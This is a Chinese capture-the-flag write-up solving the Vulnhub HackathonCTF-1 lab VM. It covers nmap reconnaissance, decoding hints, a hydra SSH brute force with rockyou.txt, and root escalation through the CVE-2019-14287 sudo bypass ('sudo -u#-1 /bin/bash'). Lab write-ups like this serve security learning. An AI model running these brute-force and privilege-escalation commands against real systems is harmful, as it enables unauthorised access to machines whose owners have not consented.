Vulnhub靶场之HackathonCTF-1
靶场下载地址:http://www.vulnhub.com/entry/hackathonctf-1,591/
本机kali地址:192.168.157.144
信息收集
第一步都是nmap扫描
nmap -sP 192.168.157.144/24
真实机是.2,目标主机是.157
接下来扫描端口和详细信息
nmap -A 192.168.157.157 -p-
可以看到目标主机开放了21,23,80,7223端口
用浏览器访问80端口看看
这not found可太秀了,打开robots.txt看看
这里显示了3个路径,但这三个路径进去显示的是404,下面那个是base64编码后的字符串,我们去解码看看
c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
//解码后
ssh-bruteforce-sudoit
暴力破解ssh?字典去哪整呢?这一句话给我干懵逼了,没事,慢慢来,扫描一下网页目录
这里我使用bp去爆破
用bp抓包后发送到intruder,将index.html设置为变量
在payload那块地方选择好字典,options那里设置好线程就可以开始爆破了
这里发现sudo.html和ftc.html可以访问,赶紧看看去
先看看sudo.html页面
在源码那里发现了一条关键信息
#uname : test
再去看看ftc.html
f12发现有些被注释掉的信息,这里可以猜测到是ascii编码,我这里用python把这些ascii码转换成相应的字母或者符号
s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"
//用split方法将字符串以#分隔开并将各个元素组成一个数组
s1 = s.split('#')
//删除掉第一个元素,因为第一个元素是空的
s1.pop(0)
for i in s1:
print(chr(int(i)),end="")//end="" 为了不换行
运行结果
use rockyou.txt
爆破
现在确定了用户名和相应的密码字典,可以爆破ssh了!
hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.157.157 -vV -f -s 7223
test:jordan23
建立连接
ssh test@192.168.157.157 -p 7223
test@192.168.157.157's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Nov 27 05:23:48 2020 from 192.168.157.144
test@ctf:~$
提权
去了家目录逛了一圈发现有两个文件夹,ctf和test,但里面没有什么有用的,sudo -l发现也没啥命令可以用
test@ctf:/home$ sudo -l
[sudo] password for test:
Matching Defaults entries for test on ctf:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User test may run the following commands on ctf:
(ALL, !root) ALL
test@ctf:/home$
这边看一下sudo的版本
test@ctf:/home$ sudo -V
Sudo version 1.8.9p5
Sudoers policy plugin version 1.8.9p5
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.9p5
test@ctf:/home$
版本有点低,其实这个版本有一个关于sudo提权的漏洞是可以使用的
CVE-2019-14287
该漏洞对1.8.28以下的版本都有用,这里我就不详细说明该漏洞了,感兴趣的同学可以去这里看看这个链接:https://baijiahao.baidu.com/s?id=1647429741181134559&wfr=spider&for=pc
接下来直接利用该漏洞就可以成功提权了
test@ctf:/home$ sudo -u#-1 id -u
0
test@ctf:/home$ sudo -u#-1 /bin/bash
root@ctf:/home#
总结
这次靶机也是比较简单的,关键点就是爆破和字典的选择,其次是对于CVE-2019-14287这个漏洞是否了解,老实说,我第一次做的时候在爆破网站目录的时候卡了很久,因为字典里没有那几个关键的目录,而且没想到robots.txt就提示了一些目录信息。
感觉爆破这个东西挺看脸的,可能是我比较菜吧。
新人发帖,希望大家多多包含,如果大家发现我某些地方讲解有误或者不严谨,请告诉我,我将感激不尽